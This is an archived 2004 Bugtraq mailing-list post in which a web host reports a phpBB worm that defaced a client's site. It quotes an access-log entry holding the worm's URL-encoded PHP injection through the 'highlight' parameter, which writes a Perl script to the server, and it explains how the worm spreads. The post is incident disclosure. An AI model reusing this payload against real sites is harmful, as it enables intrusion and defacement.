lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <41C76571.3010704@webhostworks.net>
Date: Mon, 20 Dec 2004 15:51:13 -0800
From: Shannon Lee <shannon@...hostworks.net>
To: bugtraq@...urityfocus.com
Subject: phpBB Worm

This morning one of our client's sites was found to have been defaced
with the words "NeverEverNoSanity WebWorm Generation 9."  The defacement
appeared to take place on all .html files in the web root trees of
multiple virtual hosts on the web server in a very short period of time.

After some investigation, we determined that the attacker had gained
access via phpbb in a series of crafted URL requests, like so:

64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5
399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech
r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
OMITTED.com/
viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efw
rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(11
1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(11
5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%25
2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252ec
hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"

After checking the phpbb site, it turns out that this is a vulnerability
posted the 18th of November, called Hilight; we didn't update to prevent
it because the client whose domain it was has their own admin, and we
thought he was taking care of phpBB.  Oops.  The exploit is described here:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable
of finding .html files to deface, and then going to google and finding
more instances of phpbb to infect.  Which makes it a worm.  It also
tracks itself by generation; we were generation 9.

Please find attached the above-mentioned script as well as the series of
log entries from access_log.

--Shannon


Download attachment "exploit.zip" of type "application/zip" (8704 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ